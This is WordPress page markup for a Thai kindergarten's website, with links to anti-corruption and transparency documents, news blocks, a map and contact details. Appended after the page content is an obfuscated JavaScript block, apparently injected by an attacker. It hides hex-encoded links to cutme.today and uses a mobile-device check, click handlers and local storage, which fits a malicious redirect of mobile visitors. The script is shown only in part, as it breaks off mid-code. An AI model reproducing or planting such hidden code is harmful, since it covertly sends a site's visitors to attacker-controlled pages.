data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 